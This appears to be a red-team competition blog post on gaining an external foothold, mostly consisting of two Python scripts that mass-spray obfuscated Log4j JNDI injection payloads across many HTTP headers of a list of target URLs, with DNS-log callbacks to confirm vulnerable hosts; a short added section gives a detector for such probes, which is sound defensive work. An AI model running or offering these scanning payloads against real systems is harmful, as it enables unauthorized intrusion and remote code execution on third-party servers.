Preface
The most important phase of a competition is getting a foothold on the external network; without an external entry point you never reach the intranet and everything else is wasted. As I remember it, the hottest vulnerabilities of the last few years are Shiro 550, Spring Boot RCE and Log4j RCE, so the first thing to do is scan the assets you were given for these vulnerabilities to get a quick foothold. Of course, the major OA and financial systems have plenty of vulnerabilities of their own.
Batch vulnerability scanning
log4j
fuzz spring
```python
import requests
import api.read_file  # the author's own helper module: reads target URLs from a file
import urllib3
import hashlib

urllib3.disable_warnings()

# asset-search query kept from the target-collection step; unused in this script
q = b'icon_hash="116323821" && country="CN"'

url_list = api.read_file.get_url_list('url.txt')
for url in url_list:
    # one md5 per URL, so each target gets its own identifier in the DNS log
    hl = hashlib.md5(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'  # placeholder: the DNS log domain goes here
    accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    header = {
        'Accept': accept
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')  # request raised an exception
```
fuzz all headers
```python
import requests
import api.read_file  # the author's own helper module: reads target URLs from a file
import urllib3
import hashlib

urllib3.disable_warnings()

url_list = api.read_file.get_url_list('url.txt')
for url in url_list:
    # one md5 per URL, so each target gets its own identifier in the DNS log
    hl = hashlib.md5(url.encode(encoding='utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    dnslog = 'dnslog'  # placeholder: the DNS log domain goes here
    poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    # each header value is prefixed with its own name so the DNS log shows which header fired
    header = {
        'Accept': 'accept' + '.' + poc,
        'X-Client-IP': 'X-Client-IP' + '.' + poc,
        'X-Remote-IP': 'X-Remote-IP' + '.' + poc,
        'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc,
        'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc,
        'X-Originating-IP': 'X-Originating-IP' + '.' + poc,
        'User-Agent': 'User-Agent' + '.' + poc,
        'Referer': 'Referer' + '.' + poc,
        'Authorization': 'Authorization' + '.' + poc
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('请求出现异常')  # request raised an exception
```
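As an added defensive counterpart (not code from the original post), the following Python resolves the `${::-x}` default-value lookup obfuscation that the probes above rely on and flags request header values carrying a JNDI lookup; the header samples are constructed for an offline run.

```python
import re

# Constructed sample header values in the style of this page's probe script,
# mixed with benign values (hypothetical, not captured traffic).
SAMPLE_HEADERS = [
    ("Accept", "accept.${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// abcde.dnslog/poc}"),
    ("User-Agent", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("X-Forwarded-For", "${jndi:ldap://example.invalid/a}"),
    ("Referer", "https://example.invalid/${::-s}tatic/page.html"),
]

# Log4j 2 "default value" lookup syntax is ${name:-default}. With an empty
# name, ${::-x} evaluates to the literal x, which is how the probes above
# spell out "jndi" and "rmi" one character at a time.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

def normalize_lookups(value, max_rounds=20):
    """Collapse nested ${...:-x} default-value lookups to their literal text.

    Innermost lookups are resolved first; the round limit bounds the work on
    deeply nested input instead of looping until the string stops changing.
    """
    for _ in range(max_rounds):
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)
        if new == value:
            break
        value = new
    return value

# Look for a JNDI lookup after normalization. Whitespace is tolerated because
# the probe strings on this page contain spaces between the pieces.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def is_log4shell_probe(value):
    """True when the (de-obfuscated) value contains a ${jndi:...} lookup."""
    return bool(_JNDI.search(normalize_lookups(value)))

def flag_headers(headers):
    """Return the names of headers whose value carries a JNDI lookup."""
    return [name for name, value in headers if is_log4shell_probe(value)]

if __name__ == "__main__":
    print(flag_headers(SAMPLE_HEADERS))  # ['Accept', 'X-Forwarded-For']
```

Only the `${::-x}` form shown on this page is normalized here; other Log4j lookup spellings need their own rules.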
shiro
Just run all the traffic through Burp Suite or xray once; that is the most efficient way.